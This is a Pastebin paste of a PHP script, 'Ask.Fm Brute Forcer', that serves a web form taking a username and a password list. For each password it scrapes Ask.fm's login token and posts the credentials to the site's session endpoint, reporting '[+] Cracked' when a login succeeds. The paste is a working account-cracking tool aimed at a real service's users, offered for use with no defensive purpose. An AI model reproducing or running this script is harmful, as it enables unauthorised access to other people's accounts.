Aluf

Ask.Fm Brute Forcer

Jan 21st, 2015
433
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.78 KB | None | 0 0
  1. <?
  2. # Coded By : Aluf
  3.  
  4. echo "<form method='POST'><title>Ask.Fm Brute Force</title><center>
  5. <font face='Tahoma' size='5' color='darkred'><b>Ask.Fm</b></font><font face='Tahoma' size='2'><b> Brute Force</b><br>
  6. <input name='username' placeholder='username'><br>
  7. <textarea cols='20' rows='15' name='pass'></textarea><br>
  8. <input type='submit' value='Brute' /><br></form>";
  9. @set_time_limit(0);
  10. @error_reporting(0);
  11. $site = "http://ask.fm/login/";
  12. $username = $_POST['username'];
  13. $passl = explode("\r\n", $_POST['pass']);
  14. foreach($passl as $pass)
  15. {
  16. $hash = token($site);
  17. $x = brute($hash,$username,$pass);
  18. if(preg_match('/<a href="(.*?)" class="link-menu" data-rlt-aid="tlb_menu_answers">Profile/', $x))
  19. {
  20. //print $x;
  21. print "<br>[+] Cracked : <font face='Tahoma' size='2' color='red'><b>{$username}</b></font> / <font face='Tahoma' size='2' color='red'><b>{$pass}</b></font>";
  22. flush();flush();
  23. break;
  24. }
  25. }
  26. # extract auth_token
  27. function token($site)
  28. {
  29. $curl = curl_init();
  30. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  31. curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
  32. curl_setopt($curl, CURLOPT_URL, $site);
  33. curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  34. curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  35. $b0x = curl_exec($curl);
  36. preg_match('/<input name="authenticity_token" type="hidden" value="(.*?)" /' ,$b0x ,$token);
  37. return $token[1];
  38. }
  39.  
  40. # brute
  41. function brute($hash,$username,$pass)
  42. {
  43. $curl = curl_init();
  44. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  45. curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
  46. curl_setopt($curl, CURLOPT_URL, "http://ask.fm/session");
  47. curl_setopt($curl, CURLOPT_POSTFIELDS, "authenticity_token={$hash}&login={$username}&password={$pass}&commit=Log+in");
  48. curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  49. curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  50. $brute = curl_exec($curl);
  51. return $brute;
  52. }
  53. @system("del cookie.txt");
  54. @system("rm cookie.txt");
  55. echo "<br><br><font face='Tahoma' size='2'>[+] Coded By : xSecurity | Homepage: Sec4ever.CoM <br> Greet'z : b0x - NeoDz - DamaneDz - b0x - RAB3OUN - r0kin - No-QRQR - PeRsTiGe511</font>";
  56. ?>
Advertisement
Add Comment
Please, Sign In to add comment